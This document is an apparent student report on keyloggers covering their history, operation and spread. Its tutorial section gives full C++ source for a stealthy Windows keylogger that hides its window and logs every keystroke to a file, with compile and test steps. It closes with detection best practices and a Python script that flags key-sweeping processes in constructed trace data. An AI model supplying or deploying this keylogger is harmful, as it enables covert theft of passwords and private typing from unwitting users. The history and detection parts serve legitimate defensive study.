Keylogger Report

Keylogger

Topic contents

• General overview of keyloggers

• History of the keylogger

• How do keyloggers work?

• How hackers use keyloggers?

• How keyloggers infect devices?

• How can we make keyloggers?

• Conclusion and summary

General overview of keyloggers
What are Keyloggers?
Keyloggers are a kind of malware that captures everything the user types
on the keyboard. They can also take screenshots of the user's desktop and
send the captured information to a predefined email or FTP address. In
many cases, a keylogger can spread via the network or flash memory. Hackers
use a wide range of programming languages to write keyloggers, such as C#,
VB and Java. Many techniques have been developed for detecting keyloggers.
One technique that has been introduced for dealing with keyloggers uses a
malicious profile to detect behavior similar to that of keyloggers. This
approach can fail because in many cases keyloggers use the Gmail service
as the predefined address and use "port 587" to send information via
email. This behavior is very similar to that of email software such as
Outlook or Firefox Sun Bird. Virtual keyboards are also designed to deal
with keyloggers [5]: when the user uses a virtual keyboard, the user's
information is not entered via the physical keyboard, so keyloggers cannot
capture anything. An advanced keylogger, however, can take screenshots of
the desktop, from which the attacker can guess the password. Another way
of dealing with keyloggers uses a sequence of random characters: with this
technique the information captured by the keylogger will contain the
password, but embedded in so much random junk that discovering it is
infeasible. This method uses a simple mechanism, however, and the attacker
may still detect the password [6]. Up-to-date antivirus and anti-adware
tools can help greatly in dealing with keyloggers, but we will show that
this software can fail against advanced keyloggers [7]. In many cases
hackers use a wide range of programming languages to make keyloggers, and
antivirus software can detect them by analyzing the behavior of suspicious
files. In general, keyloggers can be divided into detectable keyloggers
and undetectable keyloggers.

History of the keylogger
In the mid-1970s, the Soviet Union developed and deployed a hardware
keylogger targeting typewriters. Termed the "selectric bug", it measured the
movements of the print head of IBM Selectric typewriters via subtle
influences on the regional magnetic field caused by the rotation and
movements of the print head.[35] An early keylogger was written by Perry
Kivolowitz and posted to the Usenet newsgroup net.unix-wizards,
net.sources on November 17, 1983.[36] The posting seems to be a motivating
factor in restricting access to /dev/kmem on Unix systems. The user-mode
program operated by locating and dumping character lists (clists) as they
were assembled in the Unix kernel.

In the 1970s, spies installed keystroke loggers in the US Embassy and
Consulate buildings in Moscow.[37][38] They installed the bugs in Selectric
II and Selectric III electric typewriters.[39]

Soviet embassies used manual typewriters, rather than electric typewriters,
for classified information—apparently because they are immune to such
bugs.[39] As of 2013, Russian special services still use
typewriters.[38][40][41]

How do keyloggers work?

Keyloggers collect information and send it back to a third party – whether
that is a criminal, law enforcement or IT department. “Keyloggers are
software programs that leverage algorithms that monitor keyboard strokes
through pattern recognition and other techniques.”

The amount of information collected by keylogger software can vary. The
most basic forms may only collect the information typed into a single
website or application. More sophisticated ones may record everything you
type no matter the application, including information you copy and paste.
Some variants of keyloggers – especially those targeting mobile devices – go
further and record information such as calls (both call history and the audio),
information from messaging applications, GPS location, screen grabs, and
even microphone and camera capture.
Data captured by keyloggers can be sent back to attackers via email or by
uploading log data to predefined websites, databases, or FTP servers.

How hackers use keyloggers
The first keyloggers were used by the Soviet Union in the 1970s to monitor
IBM electric typewriters used at embassies based in Moscow. They would
record what was typed and send the information back to Soviet intelligence
via radio signals.

Today spyware such as keystroke loggers is a common part of the
cyber-criminal toolset, used to capture financial information such as
banking and credit card details, personal information such as emails and
passwords or names and addresses, or sensitive business information around
processes or intellectual property. Attackers may sell that information or
use it as part of a larger attack, depending on what was gathered and
their motives.

How keyloggers infect devices

Keyloggers can be placed on machines in a number of different ways.
Physical loggers require a person to be physically present to be placed on a
machine, meaning such attacks are harder (but not impossible) to achieve,
and more likely to come from an insider threat.

As with many types of malware, loggers are often included in phishing
emails containing malicious links. A new version of the HawkEye
keylogger, for example, was spread via a spam email campaign bearing
infected Word documents.

Let’s learn how to make a C++ keylogger:

In order to modify and compile the source, you will need a C++ IDE
(integrated development environment). For this tutorial I will use Dev C++
because it is free, lightweight, and easy to use; feel free to use any other
C++ IDE.

Download Dev C++ from here.

Install Dev C++ on your system; the installation process is very simple.
Launch it after the installation; the interface should look like the image
below. Go to the File option at the top, where you will see New; from here
choose Source file, or click on the middle of the IDE and press CTRL+N.

Here is the source code for the C++ Keylogger:
#define _WIN32_WINNT 0x0500
#include <Windows.h>
#include <string>
#include <stdlib.h>
#include <stdio.h>
#include <iostream>
#include <fstream>
using namespace std;
void LOG(string input) {
fstream LogFile; LogFile.open("dat.txt", fstream::app);
if (LogFile.is_open()) {
LogFile << input;
LogFile.close();
}
}
bool SpecialKeys(int S_Key) {
switch (S_Key) {
case VK_SPACE: cout << " ";
LOG(" "); return true;
case VK_RETURN: cout << "\n";
LOG("\n"); return true;
case '¾': cout << ".";
LOG("."); return true;
case VK_SHIFT: cout << "#SHIFT#";
LOG("#SHIFT#");
return true;
case VK_BACK: cout << "\b";
LOG("\b"); return true;
case VK_RBUTTON: cout << "#R_CLICK#";
LOG("#R_CLICK#"); return true;
case VK_CAPITAL: cout << "#CAPS_LOCK#";
LOG("#CAPS_LCOK"); return true;
case VK_TAB: cout << "#TAB";
LOG("#TAB"); return true;
case VK_UP: cout << "#UP";
LOG("#UP_ARROW_KEY"); return true;
case VK_DOWN: cout << "#DOWN";
LOG("#DOWN_ARROW_KEY"); return true;
case VK_LEFT: cout << "#LEFT";
LOG("#LEFT_ARROW_KEY"); return true;
case VK_RIGHT: cout << "#RIGHT";
LOG("#RIGHT_ARROW_KEY"); return true;
case VK_CONTROL: cout << "#CONTROL";
LOG("#CONTROL"); return true;
case VK_MENU: cout << "#ALT";
LOG("#ALT"); return true;
default:
return false; }
}
int main(){
ShowWindow(GetConsoleWindow(), SW_HIDE);
char KEY = 'x';
while (true) {
Sleep(10); for (int KEY = 8;
KEY <= 190; KEY++) {
if (GetAsyncKeyState(KEY) == -32767) {
if (SpecialKeys(KEY) == false) {
fstream LogFile;
LogFile.open("dat.txt", fstream::app);
if (LogFile.is_open()) {
LogFile << char(KEY);
LogFile.close();
}
}
}
}
}
return 0;
}

Copy all of the C++ keylogger source code and paste it into the Dev C++ IDE.
To compile it, go to the Execute option and choose Compile or
press the F9 function key; it will ask you for a location to save your keylogger.
Choose your location and save it to start the compilation process.

After successful compilation, you will see your keylogger in executable form in the folder you
chose when compiling the C++ keylogger source code.

Now test your keylogger: start the application. You will see nothing, because it is coded to run in
stealth mode in the background. Open a browser and type something, then go to the C++
keylogger folder; you will see a text file called dat which contains the information you typed.

The figure below shows the data in the dat file

It will keep running in the background unless you stop it. To close the C++ keylogger, go to Task
Manager by pressing Ctrl+Alt+Del, select the keylogger and choose End task.

Conclusion and summary
6 best practices for detecting and removing keyloggers
1. Monitor resource allocation, processes and data

2. Keep antivirus and anti-rootkit protection up to date

3. Use anti-keylogger software

4. Consider virtual onscreen keyboards

5. Disable self-running files on external devices

6. Have a strong password policy
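
Practice 1 applied to the sample in this report, as an added example that is not part of the original report: the source above calls GetAsyncKeyState for every key code from 8 to 190 every 10 ms, hides its console window and appends to dat.txt, and that pattern stands out in an API-call trace. The trace row format, the "AppendFile" event name, the PIDs and both thresholds are assumptions, and the rows are constructed sample data.

```python
from collections import defaultdict

SW_HIDE = 0               # ShowWindow command value that hides a window
MIN_DISTINCT_VKS = 100    # assumed threshold: games and hotkey tools poll a few keys
MIN_POLLS_PER_SEC = 1000  # assumed threshold for a tight polling loop

def build_sample_trace():
    """Constructed rows (time_ms, pid, api, arg); "AppendFile" is a hypothetical event."""
    rows = [(0, 4242, "ShowWindow", SW_HIDE)]
    for t in range(0, 1000, 10):                 # one full sweep every 10 ms
        rows += [(t, 4242, "GetAsyncKeyState", vk) for vk in range(8, 191)]
        if t % 200 == 0:
            rows.append((t, 4242, "AppendFile", "dat.txt"))
    for t in range(0, 1000, 5):                  # game polling four movement keys
        rows += [(t, 5150, "GetAsyncKeyState", vk) for vk in (0x57, 0x41, 0x53, 0x44)]
    rows.append((300, 6001, "AppendFile", "notes.txt"))  # editor, no key polling
    return rows

def find_keyboard_sweepers(rows):
    """Return {pid: findings} for processes that poll the whole key range at speed."""
    vks, polls = defaultdict(set), defaultdict(int)
    appends, hidden, first, last = defaultdict(set), set(), {}, {}
    for t, pid, api, arg in rows:
        first[pid] = min(first.get(pid, t), t)
        last[pid] = max(last.get(pid, t), t)
        if api == "GetAsyncKeyState":
            vks[pid].add(arg)
            polls[pid] += 1
        elif api == "ShowWindow" and arg == SW_HIDE:
            hidden.add(pid)
        elif api == "AppendFile":
            appends[pid].add(arg)
    flagged = {}
    for pid, keys in vks.items():
        seconds = max(last[pid] - first[pid], 1) / 1000.0
        rate = polls[pid] / seconds
        # Breadth and rate together separate a sweep from normal hotkey polling.
        if len(keys) >= MIN_DISTINCT_VKS and rate >= MIN_POLLS_PER_SEC:
            flagged[pid] = {
                "distinct_vks": len(keys),
                "polls_per_sec": round(rate),
                "hides_window": pid in hidden,          # corroborating signal
                "append_targets": sorted(appends[pid]), # where to look for the log
            }
    return flagged

if __name__ == "__main__":
    for pid, info in find_keyboard_sweepers(build_sample_trace()).items():
        print(pid, info)
```

The game process in the sample polls faster per key than the keylogger but touches only four key codes, which is why the check requires breadth as well as rate.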
